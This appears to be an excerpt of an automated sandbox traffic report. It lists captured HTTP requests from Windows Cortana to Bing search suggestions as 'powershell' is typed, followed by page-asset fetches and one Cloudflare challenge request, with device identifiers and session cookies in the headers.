          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=p&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=af41f482fd644dc08e178ad70ac98253&ig=fff5cb64ba6348379a8dc0b7187e93e7 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-s
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerz&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=6&cvid=af41f482fd644dc08e178ad70ac98253&ig=29b3b08290db400e8d68c7073071cd93 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzh&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=7&cvid=af41f482fd644dc08e178ad70ac98253&ig=15c32915b8c04714be06c7e807bbea0b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Non
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzhe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=8&cvid=af41f482fd644dc08e178ad70ac98253&ig=a2774f340a9249c8818ab36338fba167 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: No
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzhel&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=9&cvid=af41f482fd644dc08e178ad70ac98253&ig=a2534177ed6a4318a3480e74ea6d1a20 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: N
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzhell&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=10&cvid=af41f482fd644dc08e178ad70ac98253&ig=31c1ce68ffec44f3966ebbb3c57b0312 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities:
          Source: global trafficHTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweooBkQGUAYcBgAGEAb8BwgEwtwHFAQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /th?id=OSK.f61d5e24b78d16ddc943170b8fc16e54&w=80&h=80&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C60L1QTiBf8L5grQCsMIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rb/3C/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Wed, 11 Aug 2010 06:19:28 GMTcookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/hNxzr-RHKbwBAMICMusrEHvzZ7Q.css?bu=M-0K5grzCuYK1wvmCt0L5grmCuYK6AvmCu8L5gr1C-YK-wvmCoEM5gqFC-YKiwvmCv8K5grmCs4L5gqaC-YKoAvmCpQL5grmCrALswvmCuYKywu5C-YKvwvCC-YKrQzmCocM5groDA&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /search?q=powershell&form=WMSRPA&ao=1&qs=MB&cvid=af41f482fd644dc08e178ad70ac98253&pq=powerzhe&cc=CH&setlang=en-CH&wsso=Moderate&qfig=89dcd3d6be8143679967089a42b80406&darkschemeovr=1 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 RestrictedAPIx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 416x588x-bm-devicedimensionslogical: 416x588x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl
          Source: global trafficHTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdUM5grmCuYK5grmCuYK5grmCg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powers&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=6&cvid=af41f482fd644dc08e178ad70ac98253&ig=8db12d7da2ff4c3a8ce6329665e80935 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1474083843:1749238381:eE9ysPZQfYUadE3QCqSq6WZ-hhX64N8QGXpDs6VsKog/94baa202eb60f0c1/g3viMhRDsYd1ykt1gLS23qGt_IZ.l42n5lw3WzF5XAw-1749241462-1.2.1.1-qnFvEaq_eMcsy3EJqM1uRU7fycmB08b9m6hM5SK_uekN9lTk29IKs9aFkZMA2n8K HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
